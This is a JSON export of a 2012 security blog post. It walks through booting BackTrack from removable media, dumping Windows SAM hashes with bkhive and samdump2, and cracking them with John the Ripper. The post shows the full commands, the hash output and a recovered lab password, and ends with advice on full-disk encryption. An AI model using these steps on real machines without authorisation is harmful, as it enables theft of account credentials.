{"id":443,"date":"2012-03-04T16:54:31","date_gmt":"2012-03-04T15:54:31","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=443"},"modified":"2017-01-10T12:02:08","modified_gmt":"2017-01-10T12:02:08","slug":"mount-and-crack-a-windows-partition-passwords","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/03\/04\/mount-and-crack-a-windows-partition-passwords\/","title":{"rendered":"Mount and crack a windows partition passwords"},"content":{"rendered":"<p>Simply drop in your <a href=\"http:\/\/www.backtrack-linux.org\/\" target=\"_blank\">backtrack5<\/a> CD or USB and boot from the inserted media. Once booted type <em>startx<\/em>, you can do everything from the console but it&#8217;s nicer to have a pretty GUI!<\/p>\n<p>Left click Places at the top and then click on the windows partition you wish to mount.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/03\/mountwindowspartition.png\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/03\/mountwindowspartition-150x150.png\" alt=\"\" title=\"mountwindowspartition\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-447\" \/><\/a><br \/>\nThen open a terminal and first of all use <em>bkhive<\/em> to dump the syskey bootkey from the windows hive.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"co4\">root@bt:~# <\/span>bkhive <span class=\"sy0\">\/<\/span>media<span class=\"sy0\">\/<\/span>10B9-F2B6<span class=\"sy0\">\/<\/span>WINNT<span class=\"sy0\">\/<\/span>system32<span class=\"sy0\">\/<\/span>config<span class=\"sy0\">\/<\/span>SYSTEM <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>keyfile.txt<br \/>\nbkhive 1.1.1 by Objectif Securite<br \/>\nhttp:<span class=\"sy0\">\/\/<\/span>www.objectif-securite.ch<br \/>\noriginal author: ncuomo<span class=\"sy0\">@<\/span>studenti.unina.it<br \/>\n<br \/>\nRoot Key : <span class=\"re4\">$$<\/span><span class=\"re1\">$PROTO<\/span>.HIV<br \/>\nDefault ControlSet: 001<br \/>\nBootkey: 7abeb4c282eaef5bfa7a75c197be8f85<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The next step is to use the SAM file along with the bootkey to get at the hashes:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"co4\">root@bt:~# <\/span>samdump2 <span class=\"sy0\">\/<\/span>media<span class=\"sy0\">\/<\/span>10B9-F2B6<span class=\"sy0\">\/<\/span>WINNT<span class=\"sy0\">\/<\/span>system32<span class=\"sy0\">\/<\/span>config<span class=\"sy0\">\/<\/span>SAM <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>keyfile.txt <span class=\"sy0\">|<\/span> <span class=\"kw2\">tee<\/span> hashes.txt<br \/>\nsamdump2 1.1.1 by Objectif Securite<br \/>\nhttp:<span class=\"sy0\">\/\/<\/span>www.objectif-securite.ch<br \/>\noriginal author: ncuomo<span class=\"sy0\">@<\/span>studenti.unina.it<br \/>\n<br \/>\nRoot Key : SAM<br \/>\nAdministrator:<span class=\"nu0\">500<\/span>:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::<br \/>\nGuest:<span class=\"nu0\">501<\/span>:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br \/>\nASPNET:<span class=\"nu0\">1000<\/span>:b50fd6425ebf847332ada17f89c09dc9:63c184dd474f5d902a830545d9bdcfad:::<br \/>\nIUSR_WEBINSPECT:<span class=\"nu0\">1001<\/span>:eeb699201309cb097b3ac7d5e9ecfe77:d61861bf937514d0a6dd9fbf4e7b8376:::<br \/>\nIWAM_WEBINSPECT:<span class=\"nu0\">1002<\/span>:7d5621a567c0b5433c884480b718e30a:a4283d74fda5cd3a65641d52873adb78:::<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now that we have the hashes we can start cracking them using bruteforce or wordlist attacks. In this example I will use <a href=\"http:\/\/www.openwall.com\/john\/\" target=\"_blank\">john the ripper<\/a> as it&#8217;s just a quick demo but you could also use <a href=\"http:\/\/ophcrack.sourceforge.net\/\" target=\"_blank\">ophcrack<\/a> to utilise <a href=\"http:\/\/ophcrack.sourceforge.net\/tables.php\" target=\"_blank\">rainbow tables<\/a> or <a href=\"http:\/\/hashcat.net\/oclhashcat-plus\/\" target=\"_blank\">hashcat<\/a> to utilise the power of your GPU.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"co4\">root@bt:~# <\/span><span class=\"kw3\">cd<\/span> <span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>passwords<span class=\"sy0\">\/<\/span>john<span class=\"sy0\">\/<\/span><br \/>\nroot<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>passwords<span class=\"sy0\">\/<\/span>john<span class=\"co0\"># john \/root\/hashes.txt <\/span><br \/>\nWarning: detected <span class=\"kw3\">hash<\/span> <span class=\"kw3\">type<\/span> <span class=\"st0\">&quot;lm&quot;<\/span>, but the string is also recognized <span class=\"kw2\">as<\/span> <span class=\"st0\">&quot;nt&quot;<\/span><br \/>\nUse the <span class=\"st0\">&quot;--format=nt&quot;<\/span> option to force loading these <span class=\"kw2\">as<\/span> that <span class=\"kw3\">type<\/span> instead<br \/>\nWarning: detected <span class=\"kw3\">hash<\/span> <span class=\"kw3\">type<\/span> <span class=\"st0\">&quot;lm&quot;<\/span>, but the string is also recognized <span class=\"kw2\">as<\/span> <span class=\"st0\">&quot;nt2&quot;<\/span><br \/>\nUse the <span class=\"st0\">&quot;--format=nt2&quot;<\/span> option to force loading these <span class=\"kw2\">as<\/span> that <span class=\"kw3\">type<\/span> instead<br \/>\nLoaded <span class=\"nu0\">9<\/span> password hashes with no different salts <span class=\"br0\">&#40;<\/span>LM DES <span class=\"br0\">&#91;<\/span><span class=\"nu0\">128<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">128<\/span> BS SSE2<span class=\"br0\">&#93;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"br0\">&#40;<\/span>Guest<span class=\"br0\">&#41;<\/span><br \/>\nNK &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class=\"br0\">&#40;<\/span>Administrator:<span class=\"nu0\">2<\/span><span class=\"br0\">&#41;<\/span><br \/>\nHACMEBA &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"br0\">&#40;<\/span>Administrator:<span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span><br \/>\nguesses: <span class=\"nu0\">3<\/span> &nbsp;time: <span class=\"nu0\">0<\/span>:00:00:<span class=\"nu0\">39<\/span> <span class=\"nu0\">0.01<\/span><span class=\"sy0\">%<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">3<\/span><span class=\"br0\">&#41;<\/span> &nbsp;c<span class=\"sy0\">\/<\/span>s: 173509K &nbsp;trying: 08529IK - 08527NI<br \/>\nWarning: passwords printed above might be partial<br \/>\nUse the <span class=\"st0\">&quot;--show&quot;<\/span> option to display all of the cracked passwords reliably<br \/>\nSession aborted<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Bingo!<\/strong> Looks like we&#8217;ve got the first and seconds parts of the 9 character password (which was split into 2 hashes of lengths 7chars and then 2 chars, the whole reason we use passwords of more than 14 characters!)<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">root<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>passwords<span class=\"sy0\">\/<\/span>john<span class=\"co0\"># john --show \/root\/hashes.txt <\/span><br \/>\nAdministrator:HACMEBANK:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::<br \/>\nGuest::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br \/>\n<br \/>\n<span class=\"nu0\">3<\/span> password hashes cracked, <span class=\"nu0\">6<\/span> left<br \/>\nroot<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>passwords<span class=\"sy0\">\/<\/span>john<span class=\"co0\">#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Password = HACMEBANK<\/p>\n<p>So the moral of the story is use <a href=\"https:\/\/www.comparitech.com\/blog\/information-security\/truecrypt-is-discoutinued-try-these-free-alternatives\/\" target=\"_blank\">full disk encryption<\/a> to protect this type of attack (and as extra precaution prevent booting of CD, DVD and removable media devices)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Simply drop in your backtrack5 CD or USB and boot from the inserted media. Once booted type startx, you can do everything from the console but it&#8217;s nicer to have a pretty GUI! Left click Places at the top and then click on the windows partition you wish to mount. Then open a terminal and [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[163,162,159,161,160,164,127],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/443"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=443"}],"version-history":[{"count":7,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/443\/revisions"}],"predecessor-version":[{"id":1342,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/443\/revisions\/1342"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}